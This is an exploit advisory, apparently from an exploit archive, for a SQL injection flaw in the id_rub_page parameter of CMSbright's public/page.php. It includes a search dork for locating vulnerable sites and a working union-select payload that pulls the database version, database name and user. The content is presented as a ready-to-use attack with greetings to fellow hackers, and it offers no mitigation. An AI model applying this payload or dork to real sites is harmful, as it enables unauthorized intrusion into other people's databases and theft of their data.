id: 3582
date: 08/31/2008
title: CMSbright (id_rub_page) Remote SQL Injection Vulnerability
author: BorN To K!LL
cves: 

==========================================================
CMSbright (id_rub_page) Remote SQL Injection Vulnerability
==========================================================


-------------------------------------------
Script  :  CMSbright ..
 
site     :  http://www.cmsbright.com/
 
Author :  BorN To K!LL
 
Dork    :  powered by CMSbright © websens
-------------------------------------------
 
Exploit   :
 
public/page.php?id_rub_page=[SQL]
 
Example :
 
public/page.php?id_rub_page=-9990+union+all+select+concat(version(),database(),user()),2,3,4--
 
-------------------------------------------  
Greets :
 
Dr.2  ,  General C  ,  CcTero0liTi  ,  GolD_M .. & all my friends ..
 
-------------------------------------------



#  0day.today [2023-03-27]  #